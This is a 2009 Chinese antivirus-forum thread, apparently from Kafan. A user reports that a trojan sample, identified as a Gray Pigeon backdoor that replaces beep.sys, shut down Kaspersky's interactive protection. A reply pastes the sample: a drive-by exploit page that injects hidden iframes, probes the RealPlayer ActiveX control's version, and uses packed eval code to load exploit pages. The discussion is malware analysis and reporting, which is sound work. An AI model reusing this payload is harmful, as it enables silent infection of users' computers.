找到一毒成功突破卡巴交互模式

显示全部楼层 · 发表于 2009-5-10 16:38:37

今天样本区闲逛，心血来潮实机运行了其中一个木马。。。
试试卡巴的HIPS究竟如何，结果运行了此样本（地址http://bbs.kafan.cn/thread-477690-1-1.html）后卡巴给出提示（交互模式）说程序有较高威胁度是否执行，偶选了限制，结果偶大吃一惊卡巴托盘图标消失毫无反应

，偶打开XueTR一看卡巴进程只剩一个。。。

。见此情景顿时我有了兴趣[:26:] ，ghost系统后用SSM测试结果发现是个鸽子
而且替换了beep.sys，并且加载服务项“傻子的肉鸡”

。
现在我最感兴趣的是它是如何在卡巴没提示的情况下咔嚓了卡巴的

[ 本帖最后由 jefffire 于 2009-5-10 16:43 编辑 ]

显示全部楼层 · 发表于 2009-5-10 16:44:56

如果是替换beep.sys这类的病毒卡巴交互模式可以拦截的，是不是设定或者遇到资源冲突导致的crashed

附此样本
只是一个带有恶意代码的script而已，所以应该导致崩溃的不是这个样本，而是下载后的样本
<script src="../xnnn.js"></script>
<script src="../zhin.js"></script>
<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=../14.htm></iframe>");
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=../active.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=../cx.htm width=100 height=0></iframe>");
function WoAYuTian()
{
YuTian = "IERPCtl.IER"+"PCtl.1";
try
{
YiTn = new ActiveXObject(YuTian);
}catch(error){return;}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8 = 9.6("5"+"7");e(8<="4.0.2.3")a.k("<f j=1 c=0 i=../g.d></f>");b a.k("<f j=1 c=0 i=../h.d></f>");',62,21,'|100|14|552|6|PRODUCTVE|PlayerProperty|RSION|Tellm|YiTn|document|else|height|htm|if|iframe|real10|real11|src|width|write'.split('|'),0,{}))
}
WoAYuTian();
</script>
<script src=../wewew.js></script>
</html>

显示全部楼层 · 发表于 2009-5-10 16:52:42

乃上报了吗？要是被坏人利用就不好了啊！

显示全部楼层 · 发表于 2009-5-10 16:59:10

是不是进错地址了？？
第一次发帖的时候地址发错了后来编辑了
附上样本

[ 本帖最后由 jefffire 于 2009-5-10 17:02 编辑 ]

显示全部楼层 · 发表于 2009-5-10 17:01:44

关键不是能不能拦截，而是卡巴被咔嚓了更本无法进行交互了。。。。

显示全部楼层 · 发表于 2009-5-10 17:02:40

你给错地址了

显示全部楼层 · 发表于 2009-5-10 17:04:00

你可以把经过通过forum.kaspersky.com的短信系统给Rinat Salihov

我现在没用卡巴没法测试

显示全部楼层 · 发表于 2009-5-10 17:04:11

貌似现在还没入病毒库。

显示全部楼层 · 发表于 2009-5-10 17:05:33

真进错了。。。。到处是错误

显示全部楼层 · 发表于 2009-5-10 17:07:23

那个论坛没注册过。。。偶英语也差。。

找到一毒成功突破卡巴交互模式

回复 1楼 jefffire 的帖子

回复 2楼 syfwxmh 的帖子

回复 2楼 syfwxmh 的帖子

回复 4楼 jefffire 的帖子

回复 5楼 jefffire 的帖子

回复 6楼 syfwxmh 的帖子

回复 7楼 syfwxmh 的帖子